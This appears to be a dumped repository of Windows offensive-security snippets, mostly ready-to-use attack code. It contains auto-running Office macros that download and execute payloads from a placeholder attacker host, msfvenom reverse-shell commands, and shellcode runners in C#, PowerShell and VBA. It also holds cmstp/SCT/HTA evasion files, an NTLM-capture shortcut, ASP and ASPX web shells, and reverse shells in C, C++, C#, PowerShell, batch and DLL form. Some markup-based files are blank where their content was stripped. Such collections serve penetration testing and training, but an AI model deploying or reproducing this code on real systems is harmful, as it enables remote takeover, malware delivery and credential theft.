14 | Set wsh = CreateObject("Wscript.Shell") 15 | 16 | shellBin = "shell.exe" 17 | exePath = ActiveDocument.Path + "\" + shellBin 18 | psCmd = "powershell (New-Object System.Net.WebClient).DownloadFile('http://VAR_ATTACKER_HOST:VAR_ATTACKER_PORT/" + shellBin + "', '" + shellBin + "')" 19 | wsh.Run psCmd, 0, True 20 | wsh.Run exePath, 0, True 21 | Kill exePath 22 | End Sub 23 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-1.vbs: -------------------------------------------------------------------------------- 1 | ' 
msfvenom -p windows/x64/shell_reverse_tcp lhost=VAR_ATTACKER_HOST lport=443 -f psh-reflection > test.doc 2 | 3 | Set Shell = CreateObject ("WScript.Shell") 4 | Shell.run("powershell -WindowStyle Hidden -ExecutionPolicy Bypass (New-Object Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST/test.doc') | IEX") -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-1.xls: -------------------------------------------------------------------------------- 1 | =msexcel|'..\..\..\Windows\system32\cmd.exe /c calc.exe'!A0 -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-2.js: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 10 | 11 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/downloader-2.vba: -------------------------------------------------------------------------------- 1 | Sub MyMacro() 2 | Dim str As String 3 | str = "powershell (New-Object System.Net.WebClient).DownloadString('http://VAR_ATTACKER_HOST:VAR_ATTACKER_PORT/picture.jpg') | IEX" 4 | Shell str, vbHide 5 | End Sub 6 | 7 | Sub Document_Open() 8 | MyMacro 9 | End Sub 10 | 11 | Sub AutoOpen() 12 | MyMacro 13 | End Sub -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Management.Automation; 3 | using System.Configuration.Install; 4 | using System.Diagnostics; 5 | 6 | 7 | namespace ConsoleApp 8 | { 9 | 10 | class Program 11 | { 12 | 13 | static void Main(string[] args) 14 | { 15 | Console.WriteLine("This application does no harm."); 16 | } 17 | } 18 | 19 | [System.ComponentModel.RunInstaller(true)] 20 | public class Sample : System.Configuration.Install.Installer 21 | { 22 | 23 | public 
override void Uninstall(System.Collections.IDictionary savedState) 24 | { 25 | // Code goes here... 26 | } 27 | } 28 | 29 | } -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-1.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-1.inf: -------------------------------------------------------------------------------- 1 | ;cmstp.exe /s cmstp.inf 2 | 3 | [version] 4 | Signature=$chicago$ 5 | AdvancedINF=2.5 6 | 7 | [DefaultInstall_SingleUser] 8 | UnRegisterOCXs=UnRegisterOCXSection 9 | 10 | [UnRegisterOCXSection] 11 | %11%\scrobj.dll,NI,https://VAR_ATTACKER_HOST:ATTACKER_PORT/test.sct 12 | 13 | [Strings] 14 | AppAct = "SOFTWARE\Microsoft\Connection Manager" 15 | ServiceName="Yay" 16 | ShortSvcName="Yay" -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-1.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 9 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 22 | 23 | 24 | 25 | 26 | 34 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-1.url: -------------------------------------------------------------------------------- 1 | [InternetShortcut] 2 | URL=file:///c:\windows\system32\calc.exe 3 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-1.wsf: -------------------------------------------------------------------------------- 1 | 2 | 3 | 8 | 13 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-2.hta: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 10 | 11 | 12 | 13 | 14 | 
-------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-2.inf: -------------------------------------------------------------------------------- 1 | ; DRIVER.INF 2 | ; Copyright (c) Microsoft Corporation. All rights reserved. 3 | 4 | [Version] 5 | Signature = "$CHICAGO$" 6 | Class=61883 7 | ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} 8 | Provider=%Msft% 9 | DriverVer=06/21/2006,6.1.7600.16385 10 | 11 | [DestinationDirs] 12 | DefaultDestDir = 1 13 | 14 | [DefaultInstall] 15 | AddReg = CalcStart 16 | 17 | [CalcStart] 18 | HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe""" -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-2.sct: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 10 | 11 | 12 | 13 | 14 | 19 | 20 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-msxml.xml: -------------------------------------------------------------------------------- 1 | 2 | 6 | 7 | 8 | 11 | 12 | 13 | 14 | 15 | iex notepad.exe 16 | 17 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/evasion-msxml.xsl: -------------------------------------------------------------------------------- 1 | 2 | 3 | 7 | 8 | 9 | 12 | 15 | 16 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/ntlm-1.url: -------------------------------------------------------------------------------- 1 | [InternetShortcut] 2 | URL=https://10.0.0.1 3 | IconIndex=0 4 | IconFile=\\10.0.0.1\test.ico 5 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/ntlm-evasion-mssql-1.csproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 
6 | 7 | 8 | 9 | 10 | 11 | 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/runner-1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Threading.Tasks; 3 | using System.Diagnostics; 4 | using System.Runtime.InteropServices; 5 | 6 | 7 | // msfvenom -p windows/x64/shell_reverse_tcp lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT -f csharp 8 | 9 | 10 | namespace ConsoleApp { 11 | 12 | class Program { 13 | 14 | [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] 15 | static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 16 | [DllImport("kernel32.dll")] 17 | static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 18 | [DllImport("kernel32.dll")] 19 | static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 20 | 21 | static void Main(string[] args) 22 | { 23 | byte[] buf = new byte[460] { 24 | 0xfc,0x48,[...],0xff,0xd5 25 | }; 26 | int size = buf.Length; 27 | IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40); 28 | Marshal.Copy(buf, 0, addr, size); 29 | IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero); 30 | WaitForSingleObject(hThread, 0xFFFFFFFF); 31 | } 32 | 33 | } 34 | 35 | } 36 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/runner-1.ps1: -------------------------------------------------------------------------------- 1 | # msfvenom -p windows/meterpreter/reverse_https lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT exitfunc=thread -f ps1 2 | 3 | $Kernel32 = @" 4 | using System; 5 | using System.Runtime.InteropServices; 6 | public class Kernel32 { 7 | [DllImport("kernel32")] 8 | public static extern IntPtr 
VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 9 | [DllImport("kernel32", CharSet=CharSet.Ansi)] 10 | public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); 11 | [DllImport("kernel32.dll", SetLastError=true)] 12 | public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds); 13 | } 14 | "@ 15 | 16 | Add-Type $Kernel32 17 | 18 | [Byte[]] $buf = [Byte[]] $buf = 0xfc,0xe8,[...],0xff,0xd5; 19 | $size = $buf.Length; 20 | 21 | [IntPtr]$addr = [Kernel32]::VirtualAlloc(0, $size, 0x3000, 0x40); 22 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size); 23 | $thandle = [Kernel32]::CreateThread(0, 0, $addr, 0, 0, 0); 24 | [Kernel32]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF") 25 | -------------------------------------------------------------------------------- /snippets/windows/maldocs/runner-1.vba: -------------------------------------------------------------------------------- 1 | ' msfvenom -p windows/meterpreter/reverse_https lhost=VAR_ATTACKER_HOST lport=VAR_ATTACKER_PORT exitfunc=thread -f vbapplication 2 | ' run post/windows/manage/migrate 3 | 4 | Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" ( _ 5 | ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr 6 | 7 | Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" ( _ 8 | ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr 9 | 10 | Private Declare PtrSafe Function CreateThread Lib "kernel32" ( _ 11 | ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr 12 | 13 | Sub Document_Open() 14 | Init 15 | End Sub 16 | 17 | Sub AutoOpen() 18 | Init 19 | End Sub 20 | 21 | Sub Init() 
22 | 23 | Dim buf As Variant 24 | Dim addr As LongPtr 25 | Dim counter As Long 26 | Dim data As Long 27 | Dim res As Long 28 | 29 | buf = Array( _ 30 | 232,143,[...],255,213 _ 31 | ) 32 | 33 | addr = VirtualAlloc(0, UBound(buf), &H3000, &H40) 34 | 35 | For counter = LBound(buf) To UBound(buf) 36 | data = buf(counter) 37 | res = RtlMoveMemory(addr + counter, data, 1) 38 | Next counter 39 | 40 | res = CreateThread(0, 0, addr, 0, 0, 0) 41 | 42 | End Sub 43 | 44 | -------------------------------------------------------------------------------- /snippets/windows/shells/bind/PortListener.ps1: -------------------------------------------------------------------------------- 1 | $endpoint = New-Object System.Net.IPEndPoint([System.Net.IPAddress]::Any, VAR_TARGET_PORT) 2 | $listener = New-Object System.Net.Sockets.TcpListener $endpoint 3 | $listener.Start() 4 | do { 5 | $client = $listener.AcceptTcpClient() 6 | $stream = $client.GetStream(); 7 | $reader = New-Object System.IO.StreamReader $stream 8 | do { 9 | $line = $reader.ReadLine() 10 | Write-Host $line -fore cyan 11 | } while ($line -and $line -ne ([char]4)) 12 | $reader.Dispose() 13 | $stream.Dispose() 14 | $client.Dispose() 15 | } while ($line -ne ([char]4)) 16 | $listener.Stop() -------------------------------------------------------------------------------- /snippets/windows/shells/bind/web1.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Function RunCmd(command) 3 | Dim res as integer 4 | Dim myProcess As New Process() 5 | Dim myProcessStartInfo As New ProcessStartInfo("cmd.exe") 6 | myProcessStartInfo.UseShellExecute = false 7 | myProcessStartInfo.RedirectStandardOutput = true 8 | myProcess.StartInfo = myProcessStartInfo 9 | myProcessStartInfo.Arguments="/c " + command 10 | myProcess.Start() 11 | Dim myStreamReader As StreamReader = myProcess.StandardOutput 12 | Dim myString As String = myStreamReader.Readtoend() 13 | myProcess.Close() 14 | RunCmd= MyString 15 | End 
Function 16 | %> 17 | Enter your shell command 18 | 19 | <% 20 | if request("cmd") "" then 21 | response.write(" 22 |

"+ RunCmd(request("cmd"))+ "
23 | ") 24 | end if 25 | %> -------------------------------------------------------------------------------- /snippets/windows/shells/bind/web2.asp: -------------------------------------------------------------------------------- 1 | <% 2 | Server.ScriptTimeout = 180 3 | 4 | ip=request.ServerVariables("REMOTE_ADDR") 5 | if ip <> "VAR_ATTACKER_HOST" then 6 | response.Status="404 Page Not Found" 7 | response.Write(response.Status) 8 | response.End 9 | end if 10 | 11 | if Request.Form("submit") <> "" then 12 | Dim wshell, intReturn, strPResult 13 | cmd = Request.Form("cmd") 14 | Response.Write ("Running command: " & cmd & "
") 15 | set wshell = CreateObject("WScript.Shell") 16 | Set objCmd = wShell.Exec(cmd) 17 | strPResult = objCmd.StdOut.Readall() 18 | 19 | response.write "
" & replace(replace(strPResult,"<","<"),vbCrLf,"
") & "
" 20 | 21 | set wshell = nothing 22 | end if 23 | 24 | %> 25 | 26 | 27 | 28 |
29 | Command:
30 | 31 |

Example command to do a directory listing:
32 | %ComSpec% /c dir 33 |

34 | 35 | 36 | -------------------------------------------------------------------------------- /snippets/windows/shells/bind/web3.asp: -------------------------------------------------------------------------------- 1 | <%@ Language=VBScript %> 2 | <% 3 | ' --------------------o0o-------------------- 4 | ' File: CmdAsp.asp 5 | ' Author: Maceo 6 | ' Release: 2000-12-01 7 | ' OS: Windows 2000, 4.0 NT 8 | ' ------------------------------------------- 9 | 10 | Dim oScript 11 | Dim oScriptNet 12 | Dim oFileSys, oFile 13 | Dim szCMD, szTempFile 14 | 15 | On Error Resume Next 16 | 17 | ' -- create the COM objects that we will be using -- ' 18 | Set oScript = Server.CreateObject("WSCRIPT.SHELL") 19 | Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK") 20 | Set oFileSys = Server.CreateObject("Scripting.FileSystemObject") 21 | 22 | ' -- check for a command that we have posted -- ' 23 | szCMD = Request.Form(".CMD") 24 | If (szCMD <> "") Then 25 | 26 | ' -- Use a poor man's pipe ... a temp file -- ' 27 | szTempFile = "C:\" & oFileSys.GetTempName( ) 28 | Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True) 29 | Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0) 30 | 31 | End If 32 | 33 | %> 34 | 35 | 36 |
" method="POST"> 37 | 38 | 39 |
40 |
41 | <%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
42 | 
43 | <% 44 | If (IsObject(oFile)) Then 45 | ' -- Read the output from our command and remove the temp file -- ' 46 | On Error Resume Next 47 | Response.Write Server.HTMLEncode(oFile.ReadAll) 48 | oFile.Close 49 | Call oFileSys.DeleteFile(szTempFile, True) 50 | End If 51 | %> 52 | 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /snippets/windows/shells/bind/web4.aspx: -------------------------------------------------------------------------------- 1 | <%@ Page Language="C#" Debug="true" Trace="false" %> 2 | <%@ Import Namespace="System.Diagnostics" %> 3 | <%@ Import Namespace="System.IO" %> 4 | 33 | 34 | 35 | Coffeeshop! 36 | 37 | 38 |
39 | 40 | 41 |
42 | 43 | 44 | 45 | 46 | -------------------------------------------------------------------------------- /snippets/windows/shells/reverse/reverse1.bat: -------------------------------------------------------------------------------- 1 | echo #include ^ >> shell.c 2 | echo #include ^ >> shell.c 3 | echo #pragma comment(lib, "w2_32") >> shell.c 4 | echo WSADATA wsaData; >> shell.c 5 | echo SOCKET Winsock; >> shell.c 6 | echo SOCKET Sock; >> shell.c 7 | echo struct sockaddr_in hax; >> shell.c 8 | echo char aip_addr[16]; >> shell.c 9 | echo STARTUPINFO ini_processo; >> shell.c 10 | echo PROCESS_INFORMATION processo_info; >> shell.c 11 | echo int main(int argc, char *argv[]) >> shell.c 12 | echo { >> shell.c 13 | echo WSAStartup(MAKEWORD(2,2), ^&wsaData); >> shell.c 14 | echo Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL); >> shell.c 15 | echo if (argv[1] == NULL){ >> shell.c 16 | echo exit(1); >> shell.c 17 | echo } >> shell.c 18 | echo struct hostent *host; >> shell.c 19 | echo host = gethostbyname(argv[1]); >> shell.c 20 | echo strcpy(aip_addr, inet_ntoa(*((struct in_addr *)host->h_addr))); >> shell.c 21 | echo hax.sin_family = AF_INET; >> shell.c 22 | echo hax.sin_port = htons(atoi(argv[2])); >> shell.c 23 | echo hax.sin_addr.s_addr =inet_addr(aip_addr); >> shell.c 24 | echo WSAConnect(Winsock,(SOCKADDR*)^&hax, sizeof(hax),NULL,NULL,NULL,NULL); >> shell.c 25 | echo if (WSAGetLastError() == 0) { >> shell.c 26 | echo memset(^&ini_processo, 0, sizeof(ini_processo)); >> shell.c 27 | echo ini_processo.cb=sizeof(ini_processo); >> shell.c 28 | echo ini_processo.dwFlags=STARTF_USESTDHANDLES; >> shell.c 29 | echo ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock; >> shell.c 30 | echo char *myArray[4] = { "cm", "d.e", "x", "e" }; >> shell.c 31 | echo char command[8] = ""; >> shell.c 32 | echo snprintf( command, sizeof(command), "%s%s%s%s", myArray[0], myArray[1], myArray[2], myArray[3]); 
>> shell.c 33 | echo CreateProcess(NULL, command, NULL, NULL, TRUE, 0, NULL, NULL, ^&ini_processo, ^&processo_info); >> shell.c 34 | echo exit(0); >> shell.c 35 | echo } else { >> shell.c 36 | echo exit(0); >> shell.c 37 | echo } >> shell.c 38 | echo } >> shell.c -------------------------------------------------------------------------------- /snippets/windows/shells/reverse/reverse1.cpp: -------------------------------------------------------------------------------- 1 | // Source: https://raw.githubusercontent.com/paranoidninja/ScriptDotSh-MalwareDevelopment/master/prometheus.cpp 2 | // Compile with g++/i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc 3 | #include 4 | #include 5 | #include 6 | #pragma comment(lib, "Ws2_32.lib") 7 | #define DEFAULT_BUFLEN 1024 8 | 9 | void RunShell(char* C2Server, int C2Port) { 10 | while(true) { 11 | Sleep(5000); 12 | SOCKET mySocket; 13 | sockaddr_in addr; 14 | WSADATA version; 15 | WSAStartup(MAKEWORD(2,2), &version); 16 | mySocket = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); 17 | addr.sin_family = AF_INET; 18 | addr.sin_addr.s_addr = inet_addr(C2Server); 19 | addr.sin_port = htons(C2Port); 20 | if (WSAConnect(mySocket, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL)==SOCKET_ERROR) { 21 | closesocket(mySocket); 22 | WSACleanup(); 23 | continue; 24 | } 25 | else { 26 | char RecvData[DEFAULT_BUFLEN]; 27 | memset(RecvData, 0, sizeof(RecvData)); 28 | int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0); 29 | if (RecvCode <= 0) { 30 | closesocket(mySocket); 31 | WSACleanup(); 32 | continue; 33 | } 34 | else { 35 | char Process[] = "cmd.exe"; 36 | STARTUPINFO sinfo; 37 | PROCESS_INFORMATION pinfo; 38 | memset(&sinfo, 0, sizeof(sinfo)); 39 | sinfo.cb = sizeof(sinfo); 40 | sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW); 
41 | sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) mySocket; 42 | CreateProcess(NULL, Process, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo); 43 | WaitForSingleObject(pinfo.hProcess, INFINITE); 44 | CloseHandle(pinfo.hProcess); 45 | CloseHandle(pinfo.hThread); 46 | 47 | memset(RecvData, 0, sizeof(RecvData)); 48 | int RecvCode = recv(mySocket, RecvData, DEFAULT_BUFLEN, 0); 49 | if (RecvCode <= 0) { 50 | closesocket(mySocket); 51 | WSACleanup(); 52 | continue; 53 | } 54 | if (strcmp(RecvData, "exit\n") == 0) { 55 | exit(0); 56 | } 57 | } 58 | } 59 | } 60 | } 61 | int main(int argc, char **argv) { 62 | FreeConsole(); 63 | if (argc == 3) { 64 | int port = atoi(argv[2]); 65 | RunShell(argv[1], port); 66 | } 67 | else { 68 | char host[] = "VAR_ATTACKER_HOST"; 69 | int port = VAR_ATTACKER_PORT; 70 | RunShell(host, port); 71 | } 72 | return 0; 73 | } -------------------------------------------------------------------------------- /snippets/windows/shells/reverse/reverse1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.IO; 4 | using System.Diagnostics; 5 | using System.ComponentModel; 6 | using System.Linq; 7 | using System.Net; 8 | using System.Net.Sockets; 9 | 10 | namespace ConnectBack 11 | { 12 | public class Program 13 | { 14 | static StreamWriter streamWriter; 15 | public static void Main(string[] args) 16 | { 17 | using(TcpClient client = new TcpClient("VAR_ATTACKER_HOST", VAR_ATTACKER_PORT)) 18 | { 19 | using(Stream stream = client.GetStream()) 20 | { 21 | using(StreamReader rdr = new StreamReader(stream)) 22 | { 23 | streamWriter = new StreamWriter(stream); 24 | StringBuilder strInput = new StringBuilder(); 25 | Process p = new Process(); 26 | p.StartInfo.FileName = "cmd.exe"; 27 | p.StartInfo.CreateNoWindow = true; 28 | p.StartInfo.UseShellExecute = false; 29 | p.StartInfo.RedirectStandardOutput = true; 30 | p.StartInfo.RedirectStandardInput = true; 
31 | p.StartInfo.RedirectStandardError = true; 32 | p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler); 33 | p.Start(); 34 | p.BeginOutputReadLine(); 35 | while(true) 36 | { 37 | strInput.Append(rdr.ReadLine()); 38 | //strInput.Append("\n"); 39 | p.StandardInput.WriteLine(strInput); 40 | strInput.Remove(0, strInput.Length); 41 | } 42 | } 43 | } 44 | } 45 | } 46 | private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine) 47 | { 48 | StringBuilder strOutput = new StringBuilder(); 49 | 50 | if (!String.IsNullOrEmpty(outLine.Data)) 51 | { 52 | try 53 | { 54 | strOutput.Append(outLine.Data); 55 | streamWriter.WriteLine(strOutput); 56 | streamWriter.Flush(); 57 | } 58 | catch (Exception err) { } 59 | } 60 | } 61 | } 62 | } -------------------------------------------------------------------------------- /snippets/windows/shells/reverse/reverse1.ps1: -------------------------------------------------------------------------------- 1 | function cleanup { 2 | if ($client.Connected -eq $true) {$client.Close()} 3 | if ($process.ExitCode -ne $null) {$process.Close()} 4 | exit} 5 | $address = 'VAR_ATTACKER_HOST' 6 | $port = 'VAR_ATTACKER_PORT' 7 | $client = New-Object system.net.sockets.tcpclient 8 | $client.connect($address,$port) 9 | $stream = $client.GetStream() 10 | $networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize 11 | $process = New-Object System.Diagnostics.Process 12 | $process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe' 13 | $process.StartInfo.RedirectStandardInput = 1 14 | $process.StartInfo.RedirectStandardOutput = 1 15 | $process.StartInfo.UseShellExecute = 0 16 | $process.Start() 17 | $inputstream = $process.StandardInput 18 | $outputstream = $process.StandardOutput 19 | Start-Sleep 1 20 | $encoding = new-object System.Text.AsciiEncoding 21 | while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())} 22 | 
$stream.Write($encoding.GetBytes($out),0,$out.Length) 23 | $out = $null; $done = $false; $testing = 0; 24 | while (-not $done) { 25 | if ($client.Connected -ne $true) {cleanup} 26 | $pos = 0; $i = 1 27 | while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) { 28 | $read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos) 29 | $pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}} 30 | if ($pos -gt 0) { 31 | $string = $encoding.GetString($networkbuffer,0,$pos) 32 | $inputstream.write($string) 33 | start-sleep 1 34 | if ($process.ExitCode -ne $null) {cleanup} 35 | else { 36 | $out = $encoding.GetString($outputstream.Read()) 37 | while($outputstream.Peek() -ne -1){ 38 | $out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}} 39 | $stream.Write($encoding.GetBytes($out),0,$out.length) 40 | $out = $null 41 | $string = $null}} else {cleanup}} -------------------------------------------------------------------------------- /snippets/windows/shells/reverse/reverse2.cpp: -------------------------------------------------------------------------------- 1 | // Modified 2 | // Original: https://raw.githubusercontent.com/paranoidninja/ScriptDotSh-MalwareDevelopment/master/prometheus.cpp 3 | // i686-w64-mingw32-g++ reverse2.cpp -o reverse2.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc 4 | 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #pragma comment(lib, "Ws2_32.lib") 11 | #define DEFAULT_BUFLEN 1024 12 | 13 | 14 | void LaunchFreddy(char* place, int shipment) { 15 | while(true) { 16 | Sleep(5555); 17 | 18 | SOCKET myShipment; 19 | sockaddr_in addr; 20 | WSADATA version; 21 | WSAStartup(MAKEWORD(2,2), &version); 22 | myShipment = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); 23 | addr.sin_family = AF_INET; 24 | addr.sin_addr.s_addr = 
inet_addr(place); 25 | addr.sin_port = htons(shipment); 26 | 27 | if (WSAConnect(myShipment, (SOCKADDR*)&addr, sizeof(addr), NULL, NULL, NULL, NULL)==SOCKET_ERROR) { 28 | closesocket(myShipment); 29 | WSACleanup(); 30 | continue; 31 | } 32 | else { 33 | char incomingPleasures[DEFAULT_BUFLEN]; 34 | memset(incomingPleasures, 0, sizeof(incomingPleasures)); 35 | int RecvCode = recv(myShipment, incomingPleasures, DEFAULT_BUFLEN, 0); 36 | if (RecvCode <= 0) { 37 | closesocket(myShipment); 38 | WSACleanup(); 39 | continue; 40 | } 41 | else { 42 | LPTSTR szCMDPath = new TCHAR[255]; 43 | GetEnvironmentVariable((LPCSTR)"COMSPEC", szCMDPath, 256); 44 | STARTUPINFO sinfo; 45 | PROCESS_INFORMATION pinfo; 46 | memset(&sinfo, 0, sizeof(sinfo)); 47 | sinfo.cb = sizeof(sinfo); 48 | sinfo.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW); 49 | sinfo.hStdInput = sinfo.hStdOutput = sinfo.hStdError = (HANDLE) myShipment; 50 | CreateProcess(NULL, szCMDPath, NULL, NULL, TRUE, 0, NULL, NULL, &sinfo, &pinfo); 51 | WaitForSingleObject(pinfo.hProcess, INFINITE); 52 | CloseHandle(pinfo.hProcess); 53 | CloseHandle(pinfo.hThread); 54 | memset(incomingPleasures, 0, sizeof(incomingPleasures)); 55 | int RecvCode = recv(myShipment, incomingPleasures, DEFAULT_BUFLEN, 0); 56 | if (RecvCode <= 0) { 57 | closesocket(myShipment); 58 | WSACleanup(); 59 | continue; 60 | } 61 | if (strcmp(incomingPleasures, "exit\n") == 0) { 62 | exit(0); 63 | } 64 | } 65 | } 66 | } 67 | } 68 | 69 | 70 | int main(int argc, char **argv) { 71 | FreeConsole(); 72 | if (argc == 3) { 73 | int port = atoi(argv[2]); 74 | LaunchFreddy(argv[1], port); 75 | } 76 | else { 77 | char host[] = "VAR_ATTACKER_HOST"; 78 | int port = VAR_ATTACKER_PORT; 79 | LaunchFreddy(host, port); 80 | } 81 | return 0; 82 | } 83 | -------------------------------------------------------------------------------- /snippets/windows/shells/reverse/reverse2.ps1: -------------------------------------------------------------------------------- 1 | $client = 
New-Object System.Net.Sockets.TCPClient("VAR_TARGET_HOST",VAR_TARGET_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() -------------------------------------------------------------------------------- /snippets/windows/shells/reverse/reverse_dll.c: -------------------------------------------------------------------------------- 1 | // gcc -shared -lws2_32 -o dll_rev_shell.dll dll_rev_shell.c 2 | // rundll32 rev.dll,main 3 | //#include "pch.h" 4 | #include "stdlib.h" 5 | #define _WINSOCK_DEPRECATED_NO_WARNINGS 6 | #include 7 | #include 8 | #pragma comment(lib,"ws2_32") 9 | 10 | //using namespace std; 11 | WSADATA wsaData; 12 | SOCKET s1; 13 | struct sockaddr_in hax; 14 | char ip_addr[16]; 15 | STARTUPINFO sui; 16 | PROCESS_INFORMATION pi; 17 | void executepayload(void) 18 | { 19 | WSAStartup(MAKEWORD(2, 2), &wsaData); 20 | s1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL); 21 | 22 | hax.sin_family = AF_INET; 23 | hax.sin_port = htons(VAR_ATTACKER_PORT); 24 | hax.sin_addr.s_addr = inet_addr("VAR_ATTACKER_HOST"); 25 | 26 | WSAConnect(s1, (SOCKADDR*)& hax, sizeof(hax), NULL, NULL, NULL, NULL); 27 | 28 | memset(&sui, 0, sizeof(sui)); 29 | sui.cb = sizeof(sui); 30 | sui.dwFlags = (STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW); 31 | sui.hStdInput = sui.hStdOutput = sui.hStdError = (HANDLE)s1; 32 | 33 | TCHAR commandLine[256] = "cmd.exe"; 34 | CreateProcess(NULL, commandLine, NULL, NULL, TRUE, 0, NULL, NULL, &sui, &pi); // EDR Prevention using api hooking 35 | } 36 | BOOL APIENTRY DllMain(HMODULE hModule, 37 | DWORD ul_reason_for_call, 38 | LPVOID 
